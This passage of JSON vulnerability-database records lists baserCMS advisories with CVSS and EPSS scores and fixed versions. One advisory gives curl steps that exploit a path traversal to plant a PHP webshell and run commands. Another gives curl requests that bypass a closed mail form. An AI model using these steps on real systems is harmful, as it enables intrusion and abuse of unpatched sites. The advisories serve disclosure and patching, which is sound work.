A-7rpc-9m88-cf9w"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-891u-x525-ykbb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91437?format=json","vulnerability_id":"VCID-8buz-nsr9-3yge","summary":"baserCMS Path Traversal Leads to Arbitrary File Write and RCE via Theme File API\n## Summary\n\nA path traversal vulnerability exists in the baserCMS 5.x theme file management API (`/baser/api/admin/bc-theme-file/theme_files/add.json`) that allows arbitrary file write.\n\nAn authenticated administrator can include `../` sequences in the `path` parameter to create a PHP file in an arbitrary directory outside the theme directory, which may result in remote code execution (RCE).\n\n## Affected Code\n\n**File**: `plugins/bc-theme-file/src/Service/BcThemeFileService.php`\n\n```php\npublic function getFullpath(string $theme, string $plugin, string $type, string $path)\n{\n // ...\n return $viewPath . $type . DS . $path; // $path is not sanitized\n}\n```\n\n## Attack Scenario\n\n1. The attacker compromises an administrator account (password leak, brute force, etc.)\n2. Obtains an access token via API login\n3. Specifies `path: \"../../../../webroot/\"` in the theme file creation API\n4. A PHP file is created in the webroot\n5. The attacker accesses the created PHP file to achieve RCE\n\n## Reproduction Steps\n\n```bash\n# 1. Login\ncurl -X POST \"http://target/baser/api/admin/baser-core/users/login.json\" \\\n -H \"Content-Type: application/json\" \\\n -d '{\"email\":\"admin@example.com\",\"password\":\"password\"}'\n\n# 2. Create webshell\ncurl -X POST \"http://target/baser/api/admin/bc-theme-file/theme_files/add.json\" \\\n -H \"Authorization: Bearer \" \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"theme\": \"BcThemeSample\",\n \"plugin\": \"\",\n \"type\": \"layout\",\n \"path\": \"../../../../webroot/\",\n \"base_name\": \"shell\",\n \"ext\": \"php\",\n \"contents\": \"\"\n }'\n\n# 3. RCE\ncurl \"http://target/shell.php?cmd=id\"\n```\n\n## Vulnerability Details\n\n| Item | Details |\n|------|---------|\n| CWE | CWE-22: Path Traversal, CWE-73: External Control of File Name or Path |\n| Impact | Arbitrary file write, Remote Code Execution (RCE) |\n| Attack Prerequisites | Administrator privileges + API enabled (`USE_CORE_ADMIN_API=true`), or chaining with XSS, etc. |\n| Reproducibility | High (PoC verified) |\n| Test Environment | baserCMS 5.x (Docker environment) |\n\n### Additional Notes on Attack Prerequisites\n\n- **When API is enabled** (`USE_CORE_ADMIN_API=true`): API calls can be made externally using JWT token authentication. Direct exploitation is possible.\n- **Default settings** (`USE_CORE_ADMIN_API=false`): Direct external API calls are prohibited. CSRF protection is also active, so this vulnerability alone cannot be exploited. An exploit chain involving XSS or similar is required.\n\n## Recommended Fix\n\nRather than relying on simple string replacement or blacklist checks of input, the canonicalized path (using `realpath()`, etc.) should be verified to be within the theme base directory after file creation or immediately before writing. If the path falls outside the boundary, the operation should be rejected.\n\nThe specific implementation location and method are left to the project's design decisions.\n\n## Comparison with Other CMS\n\nWordPress's theme editor only allows editing within `wp-content/themes/` and does not permit writes outside that directory. [CVE-2019-8943](https://www.sonarsource.com/blog/wordpress-image-remote-code-execution/) was reported as a path traversal vulnerability in `wp_crop_image()` that allowed writing cropped image output to an arbitrary directory by including `../` in the filename.\n\nThis vulnerability is not a matter of \"administrators being able to execute arbitrary code\" by design, but rather stems from a security boundary violation where \"the theme editing function can write outside the theme directory (to webroot, config, etc.).\"\n\n## Resources\n\n- OWASP Path Traversal: \n- WordPress RCE via Path Traversal (CVE-2019-8943): \n- Jira Path Traversal (CVE-2025-22167): \n\nThis advisory was translated from Japanese to English using GitHub Copilot.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-30940","reference_id":"","reference_type":"","scores":[{"value":"0.00145","scoring_system":"epss","scoring_elements":"0.34571","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-30940"},{"reference_url":"https://basercms.net/security/JVN_20837860","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:46:24Z/"}],"url":"https://basercms.net/security/JVN_20837860"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/releases/tag/5.2.3","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:46:24Z/"}],"url":"https://github.com/baserproject/basercms/releases/tag/5.2.3"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-c5c6-37vq-pjcq","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:46:24Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-c5c6-37vq-pjcq"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-30940","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-30940"},{"reference_url":"https://github.com/advisories/GHSA-c5c6-37vq-pjcq","reference_id":"GHSA-c5c6-37vq-pjcq","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-c5c6-37vq-pjcq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112578?format=json","purl":"pkg:composer/baserproject/basercms@5.2.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3"}],"aliases":["CVE-2026-30940","GHSA-c5c6-37vq-pjcq"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8buz-nsr9-3yge"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90966?format=json","vulnerability_id":"VCID-8ssu-umet-37bk","summary":"baserCMS is Vulnerable to Cross-site Scripting\nbaserCMS has DOM-based cross-site scripting in tag creation.\n\n### Target\nbaserCMS 5.2.2 and earlier versions\n\n### Vulnerability\n Malicious JavaScript may be executed when creating a tag.\n\n### Countermeasures\nUpdate to the latest version of baserCMS\n\nPlease refer to the following page to reference for more information.\nhttps://basercms.net/security/JVN_94952030\n\n### Credits\n\n- quanlna2 (Le Nguyen Anh Quan)\n- namdi (Do Ich Nam)\n- minhnn42 (Nguyen Ngoc Minh)\n- VCSLab - Viettel Cyber Security","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32734","reference_id":"","reference_type":"","scores":[{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01615","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32734"},{"reference_url":"https://basercms.net/security/JVN_20837860","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:50:30Z/"}],"url":"https://basercms.net/security/JVN_20837860"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/releases/tag/5.2.3","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:50:30Z/"}],"url":"https://github.com/baserproject/basercms/releases/tag/5.2.3"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-677c-xv24-crgx","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:50:30Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-677c-xv24-crgx"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32734","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32734"},{"reference_url":"https://github.com/advisories/GHSA-677c-xv24-crgx","reference_id":"GHSA-677c-xv24-crgx","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-677c-xv24-crgx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112578?format=json","purl":"pkg:composer/baserproject/basercms@5.2.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3"}],"aliases":["CVE-2026-32734","GHSA-677c-xv24-crgx"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8ssu-umet-37bk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/40410?format=json","vulnerability_id":"VCID-9mf7-56fh-fyfk","summary":"Cross-site Scripting\nAn issue was discovered in baserCMS In the Register New Category feature of the Upload menu, the category name can be used for XSS via the `data[UploaderCategory][name]` parameter to an `admin/uploader/uploader_categories/edit` URI.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2018-18943","reference_id":"","reference_type":"","scores":[{"value":"0.00305","scoring_system":"epss","scoring_elements":"0.54037","published_at":"2026-06-04T12:55:00Z"},{"value":"0.00305","scoring_system":"epss","scoring_elements":"0.54093","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2018-18943"},{"reference_url":"https://basercms.net/release/4_1_4","reference_id":"","reference_type":"","scores":[],"url":"https://basercms.net/release/4_1_4"},{"reference_url":"https://web.archive.org/web/20200130073341/https://basercms.net/release/4_1_4","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://web.archive.org/web/20200130073341/https://basercms.net/release/4_1_4"},{"reference_url":"https://web.archive.org/web/20211209034642/http://sunu11.com/2018/10/31/baserCMS","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://web.archive.org/web/20211209034642/http://sunu11.com/2018/10/31/baserCMS"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2018-18943","reference_id":"CVE-2018-18943","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2018-18943"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/56953?format=json","purl":"pkg:composer/baserproject/basercms@4.1.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1q79-sxzp-zker"},{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-5ay3-1t5g-vycu"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-891u-x525-ykbb"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-d5gk-q2hh-kba5"},{"vulnerability":"VCID-eq7f-n3g5-s3hu"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-hpk4-a6tr-3ffe"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-p6nr-eu91-53b4"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-twf5-bzba-gqb4"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-vqx2-hzju-r7et"},{"vulnerability":"VCID-wvnk-63hy-ykeq"},{"vulnerability":"VCID-xpsb-2yux-g3cf"},{"vulnerability":"VCID-xxud-7jsh-bbc1"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.1.4"}],"aliases":["CVE-2018-18943","GHSA-fx2m-5m9v-jhgp"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9mf7-56fh-fyfk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/109472?format=json","vulnerability_id":"VCID-ays7-6wvh-augt","summary":"baserCMS vulnerable to stored Cross-site Scripting\nStored cross-site scripting vulnerability in User group management of baserCMS versions prior to 4.7.2 allows a remote authenticated attacker with an administrative privilege to inject an arbitrary script.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-42486","reference_id":"","reference_type":"","scores":[{"value":"0.00144","scoring_system":"epss","scoring_elements":"0.3445","published_at":"2026-06-04T12:55:00Z"},{"value":"0.00144","scoring_system":"epss","scoring_elements":"0.34547","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-42486"},{"reference_url":"https://basercms.net/security/JVN_53682526","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T16:01:40Z/"}],"url":"https://basercms.net/security/JVN_53682526"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://jvn.jp/en/jp/JVN53682526/index.html","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T16:01:40Z/"}],"url":"https://jvn.jp/en/jp/JVN53682526/index.html"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-42486","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-42486"},{"reference_url":"https://github.com/advisories/GHSA-7w2v-35j3-xrm9","reference_id":"GHSA-7w2v-35j3-xrm9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7w2v-35j3-xrm9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/146599?format=json","purl":"pkg:composer/baserproject/basercms@4.7.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"},{"vulnerability":"VCID-zxns-tzw3-27fr"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.2"}],"aliases":["CVE-2022-42486","GHSA-7w2v-35j3-xrm9"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ays7-6wvh-augt"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91316?format=json","vulnerability_id":"VCID-d1sf-cmct-zbh1","summary":"baserCMS has Mail Form Acceptance Bypass via Public API\n### Summary\nA public mail submission API allows unauthenticated users to submit mail form entries even when the corresponding form is not accepting submissions. This bypasses administrative controls intended to stop form intake and enables spam or abuse via the API.\n\n### Details\nIn baserCMS, mail form submissions through the front-end UI are guarded by acceptance checks implemented in `MailFrontService::isAccepting()`, which ensures that the mail form is currently accepting submissions (e.g. within its configured publish/acceptance window).\n\nThese checks are enforced in the UI flow handled by `MailController::index()` and `MailController::confirm()` \n(e.g. `plugins/bc-mail/src/Controller/MailController.php`).\n\nHowever, the public API endpoint:\n\n`plugins/bc-mail/src/Controller/Api/MailMessagesController.php::add()`\n\ndoes not invoke `MailFrontService::isAccepting()` and does not verify whether the mail form is currently accepting submissions. As a result, the API accepts submissions regardless of the form’s acceptance state.\n\nThe endpoint does not require authentication. A valid CSRF cookie and token pair is sufficient to create a mail message. This allows submissions even when administrators intentionally disable or close the mail form via the admin UI.\n\n### PoC\n1. In the admin UI, configure a mail form so that it is **not accepting submissions** (e.g. outside its acceptance period or explicitly closed).\n2. Obtain a CSRF cookie by accessing the site root:\n```\ncurl -sS -D - -o - -c /tmp/basercms_cookies.txt 'http://localhost/'\n```\n3. Extract the CSRF token from the `csrfToken` cookie and submit a POST request to the public API endpoint:\n```\ncurl -sS -D - -o - -X POST 'http://localhost/baser/api/bc-mail/mail_messages/add/1.json' \n-H 'Content-Type: application/x-www-form-urlencoded' \n-H 'Referer: http://localhost/' \n-H 'X-CSRF-Token: ' \n-b /tmp/basercms_cookies.txt \n--data-urlencode 'name_1=Test' \n--data-urlencode 'name_2=User' \n--data-urlencode 'email_1=test@example.com' \n--data-urlencode 'email_2=test@example.com' \n--data-urlencode 'category[]=資料請求' \n--data-urlencode 'root=検索エンジン' \n--data-urlencode 'message=API bypass test'\n```\n4. The server responds with `200 OK` and creates a mail message, even though the form is configured to reject submissions.\n\n### Impact\nThis is an access control / business logic bypass vulnerability.\n\nAdministrators rely on the mail form acceptance settings to temporarily or permanently stop form intake (e.g. during maintenance, incidents, or spam attacks). This vulnerability allows attackers to bypass those controls via the public API, enabling unauthorized mail submissions, spam, and operational disruption.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-30878","reference_id":"","reference_type":"","scores":[{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05615","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-30878"},{"reference_url":"https://basercms.net/security/JVN_20837860","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:39:51Z/"}],"url":"https://basercms.net/security/JVN_20837860"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/releases/tag/5.2.3","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:39:51Z/"}],"url":"https://github.com/baserproject/basercms/releases/tag/5.2.3"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-8cr7-r8qw-gp3c","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:39:51Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-8cr7-r8qw-gp3c"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-30878","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-30878"},{"reference_url":"https://github.com/advisories/GHSA-8cr7-r8qw-gp3c","reference_id":"GHSA-8cr7-r8qw-gp3c","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-8cr7-r8qw-gp3c"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112578?format=json","purl":"pkg:composer/baserproject/basercms@5.2.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3"}],"aliases":["CVE-2026-30878","GHSA-8cr7-r8qw-gp3c"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-d1sf-cmct-zbh1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/52933?format=json","vulnerability_id":"VCID-d5gk-q2hh-kba5","summary":"Cross-site Scripting\nbaserCMS `content_info.php`, `content_options.php`, `content_related.php`, `index_list_tree.php`, `jquery.bcTree.js`.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-15154","reference_id":"","reference_type":"","scores":[{"value":"0.00784","scoring_system":"epss","scoring_elements":"0.74124","published_at":"2026-06-04T12:55:00Z"},{"value":"0.00784","scoring_system":"epss","scoring_elements":"0.74157","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-15154"},{"reference_url":"https://basercms.net/security/20200827","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://basercms.net/security/20200827"},{"reference_url":"https://github.com/baserproject/basercms/commit/7f4b905b90954e394ec10dd35bad2a5dec505371","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/commit/7f4b905b90954e394ec10dd35bad2a5dec505371"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-cpxc-67rc-c775","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-cpxc-67rc-c775"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15154","reference_id":"CVE-2020-15154","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15154"},{"reference_url":"https://github.com/advisories/GHSA-cpxc-67rc-c775","reference_id":"GHSA-cpxc-67rc-c775","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cpxc-67rc-c775"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/77910?format=json","purl":"pkg:composer/baserproject/basercms@4.3.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1q79-sxzp-zker"},{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-5ay3-1t5g-vycu"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-891u-x525-ykbb"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-eq7f-n3g5-s3hu"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-hpk4-a6tr-3ffe"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xv